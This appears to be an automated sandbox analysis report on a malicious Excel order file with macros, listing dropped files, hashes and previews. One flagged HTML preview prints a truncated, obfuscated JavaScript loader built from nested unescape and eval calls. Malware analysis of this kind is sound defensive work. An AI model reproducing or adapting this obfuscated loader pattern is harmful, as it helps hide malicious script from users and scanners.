          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.345313426624281
          Encrypted:false
          SSDEEP:1536:QA/UfH+DAtQaqrUPig97qG7bIQWkaYgJ/BXv6xU3ha:EPoBXv6i3ha
          MD5:0D07E0C1D20745CDBBFE5082E76EA070
          SHA1:41D28E4E24D1E1E778BC9469D3CF945C63AB6766
          SHA-256:0B1258021A9436EB87FECF28B44FA7643C604E71217D1459C1F12226DE727CC9
          SHA-512:978A4493176B16507E369654FF060CACE16C4F3C9D0079D2FF2CDAF966D1EAC7C7F5AF9536668E276BDC702BDCA5ADAC4861AC2A600911CC0A86F4E297F0049E
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):99352
          Entropy (8bit):2.3136165760823117
          Encrypted:false
          SSDEEP:768:hOk4vdB1DW7ohBb66mQK4BTonxqQbApQK6c:U5wc
          MD5:544DC4FE93B389F51FB0324233EDEA41
          SHA1:E0D276BE4EEE929F3C4A7DA5C2E02D1556C9EB55
          SHA-256:626FB90E6606C22F739BA4F3085C2D763A7916694295E6B5B84443631A28A346
          SHA-512:5B7045EB2E9903EC8E686F7DE1E5DF6165331E2C517CD1C3780CDDA10352E5C9E8EFD4F8578B50F0C461AF49C821C4D373693BB410F0652A0440139A09F5C4EA
          Malicious:false
          Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
          Category:dropped
          Size (bytes):8896
          Entropy (8bit):2.805964965465494
          Encrypted:false
          SSDEEP:192:tHaCEHfLum2oum2J5KUJDVUKhC74GVf/Aq2v9PV8aQeS2eLPyqv6vRc6cfzqfz45:t1EHfLum2oum2J5KUJDVUKhC74GVf/Ak
          MD5:FFAADBF04E0201F2413D3E81B47B50F5
          SHA1:FC490F928D5E8791CCC26C4C957F3786FEF50BB2
          SHA-256:648358DD4259AD9FC6E5F723487B6F009110CD976701032931163A74555258B0
          SHA-512:D726B722657BEAD1FE160C953A43AE7D46970E0AA8F2C405D9E72D6A853443F14D1A2512B04399D5798B39DAD8332C8BDC900216AA1A1E6B656925A224B6EED7
          Malicious:true
          Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):8.112143835430977E-5
          Encrypted:false
          SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
          MD5:AFDEAC461EEC32D754D8E6017E845D21
          SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
          SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
          SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):71
          Entropy (8bit):4.3462513114457515
          Encrypted:false
          SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
          MD5:8F4510F128F81A8BAF2A345D00F7E30C
          SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
          SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
          SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with very long lines (28582), with CRLF line terminators
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.30686252412047194
          Encrypted:false
          SSDEEP:1536:ryNAhVMUxfqPlguun2kMn88Fj6OFEWKcIOvAAmahPXD6e21PgE17RlgEesruSedZ:mARiGuu2kl8GKvaj+iHMX1hF6ncuT
          MD5:D7D51DA012D4414149973E6D71ABD9C2
          SHA1:009A0B3A7E505DD5201A90EEA3C7E0B71B44FD32
          SHA-256:97B020EA3A806C2E5E1494086ADBA6A1B33863AD69CF5AA9958AABC5AFF178EE
          SHA-512:A7D75C6DDF51FD51D7803435F9AE9F7FD4CF301434F0C250760449EB1A104DFDE290253C986DBEDA717BCEC258C8AB27CBD4B13A710658504E38100B15B8AA3E
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 14:07:24.247.EXCEL (0xD5C).0x1014.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-18T14:07:24.247Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:07:23.9501857Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:07:23.9501857Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:07:23.9501857Z\", \"C\" : \"\", \"Q\" : 6.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):20971520
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with very long lines (28800), with CRLF line terminators
          Category:dropped
          Size (bytes):328212
          Entropy (8bit):5.084000971312703
          Encrypted:false
          SSDEEP:1536:BMChvddAW8+TlcOrngYb6GXS4ORmYBa2muIUrjpTTuCdMJNpJ3VlMNrb89lw5/8p:phLlc5Yb6/4ju1Ews6DzFsZd
          MD5:DF01081234771E811CC63CB51A0E9C21
          SHA1:6C72E5DFCA4802AB2288409E8B1D62C99237C2B7
          SHA-256:FDD71F920D8F8B63C66F36E5AF7A7D1B86BE173A93E25C6D5A9111E402225619
          SHA-512:3E2A624BF1C8FBD8019DBC216B7BA1C4D802448628F6E05E7C0DC1A0611F341E9D3B71FC06B60A7205DBCFE354B7B32264EFA9CB02913622A596235B8DA01074
          Malicious:false
          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 14:08:59.759.EXCEL (0x648).0x13A0.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":16,"Time":"2024-12-18T14:08:59.759Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:08:59.5406825Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:08:59.5406825Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-18T14:08:59.5406825Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):229376
          Entropy (8bit):6.447447823818735
          Encrypted:false
          SSDEEP:6144:dX2Jk3hbdlylKsgwyzcTbWhZFVE+WaxHAPWhcOo7PIDqZ8:dGxW+rPJ
          MD5:1CE66A9B6EF9FB8E025E0640DEA6C10C
          SHA1:5805BF95DC155C3BA20B0CCA67DDEBDD86F4084C
          SHA-256:7D04FE079BE37EBBDAD95F19AE0A95926C982E7D472AA0E844822CB8DCB6D47F
          SHA-512:8CEA2C550F8D7629D6A2903B9AC720038C153955F7B4F4CC10242F48CC9D6D5D872848B44D42C5AF12F51E5903183B9A897749638C88AFA1E4A75FBF5D1E4996
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):53760
          Entropy (8bit):7.384939357863904
          Encrypted:false
          SSDEEP:768:xf+VIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvMYVZAfHd:x/HbXpsJ2crDtkFZ8nukBHd
          MD5:4AA6766C319051B260B9AC631D273AD8
          SHA1:92A0B4A5E4AC3EBDF239C2FD49E4A421568675BB
          SHA-256:6148D44857287A0CC90F6892D57893EF714520FFB7FE3218E97B2A76E1A77E8E
          SHA-512:9040B399A08F12BF9BC6A452DB8FDF7049DB472C5E08C91BC3D2806EAC816E22E365592ADE891528A93ED242C85F49514482D31539CCFB4C0FA084F1FA6FAAA3
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):6.469218894885753
          Encrypted:false
          SSDEEP:192:+OCUgZvC0q39vnUufWG72ofW2snm2bBxPDmSj8+2iqR7:pjgZa0AlnUufV2oO28nfDj8OqR
          MD5:DCDE56DAE1BFD6BD274EE4C92E548629
          SHA1:73B58306C0FF82E601FA763229DEE5B9172BE53E
          SHA-256:866C56EE78FE52A43122B753B3D2DF5081A1B1AB8176A8EA4E2B9939885A4230
          SHA-512:2B303FC067A0467F94039335926BDAE4B18F148F88E3F433F9A0EEAC48B55A52F9DD2A931C4F967031B546B563F5875B94E46FDBB6E1228DA9898FDB70557D63
          Malicious:false
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):7.470957448553108
          Encrypted:false
          SSDEEP:768:Fy2yF/DwTo0TJZpXXGvdfBwEhkYszQcNqWBQK7ilqjqz:fGh0tZp4tSEqtzQUYHl3
          MD5:042B4714F0146D6F95F33F43DBC182B1
          SHA1:D38FBCA7B3E914E9A397F9D9E8741DB1CC05076F
          SHA-256:DAA0270E767CBCCF0764A012B6CF2852BE43A6D7021AF4BBD999A01B65827557
          SHA-512:CDF6F0999BCFF9F74F9A9C13FA9C182E68E997DD2779BB3087BF337A1F5297F0E6BF22B94FC60B036F41C78FFC12802DA67A8AF3EB8F90617040A8CA0AC40881
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 14:08:57 2024, Security: 1
          Category:dropped
          Size (bytes):854528
          Entropy (8bit):7.624313801133453
          Encrypted:false
          SSDEEP:12288:8GTW+qJEUiOIBUzMTS1D3DERnLRmF8DhEPbxpsAQx1Zj+j9EPiPJm2Mld:8DBaUbARM8A78Z+joiPJm5d
          MD5:2831E0CAB004EC0B9E1CAD4D675F8038
          SHA1:9362CC3A35F3F200FD16448FABFDE7E15DCDA90C
          SHA-256:BB5E9F981B8417C15A184ABE084D0586B27470872B58C3915E8871AC704410A8
          SHA-512:E6B394A0DD4BC00E40F5030A287E5E438F9F874C4AB1A931757E85B41D803BB390C900FAF2C21F42561962C5A7C86B782509D85BBDA9E85D801C7A1318BD0600
          Malicious:false
          Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:false
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 14:08:57 2024, Security: 1
          Category:dropped
          Size (bytes):854528
          Entropy (8bit):7.624313801133453
          Encrypted:false
          SSDEEP:12288:8GTW+qJEUiOIBUzMTS1D3DERnLRmF8DhEPbxpsAQx1Zj+j9EPiPJm2Mld:8DBaUbARM8A78Z+joiPJm5d
          MD5:2831E0CAB004EC0B9E1CAD4D675F8038
          SHA1:9362CC3A35F3F200FD16448FABFDE7E15DCDA90C
          SHA-256:BB5E9F981B8417C15A184ABE084D0586B27470872B58C3915E8871AC704410A8
          SHA-512:E6B394A0DD4BC00E40F5030A287E5E438F9F874C4AB1A931757E85B41D803BB390C900FAF2C21F42561962C5A7C86B782509D85BBDA9E85D801C7A1318BD0600
          Malicious:true
          Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 01:00:45 2024, Security: 1
          Entropy (8bit):7.743408666722072
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Order_948575494759.xls
          File size:1'124'352 bytes
          MD5:6bcc53dc843155e886f469778b4216f1
          SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
          SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
          SHA512:cd6da13c89795461e4b804be52500b9db81887d18cadb0dd431cc49850db189f4e6dbb9731810d3ae55c7145ee46ee5fdc9e9606dfc73b08c2d9e5a9169abc28
          SSDEEP:12288:y8zJmzHJEUiOIBUzMTSSD3DERnLRmF8DhEPpxpsAQx1Zj+jLEPHbrpW8osAz85qW:MBanbARM8At8Z+j6RsSIUAI
          TLSH:0C35F1E5774DAB52CA06123575F3939E2714AC03D902427B36F8732D2AF7AD08607FA6
          File Content Preview:........................>.......................................................i...j...k...l...m...............V...W...r.......g.......i......................................................................................................................
          Icon Hash:35ed8e920e8c81b5
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Author:
          Last Saved By:
          Create Time:2006-09-16 00:00:00
          Last Saved Time:2024-12-18 01:00:45
          Creating Application:Microsoft Excel
          Security:1
          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:786432
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
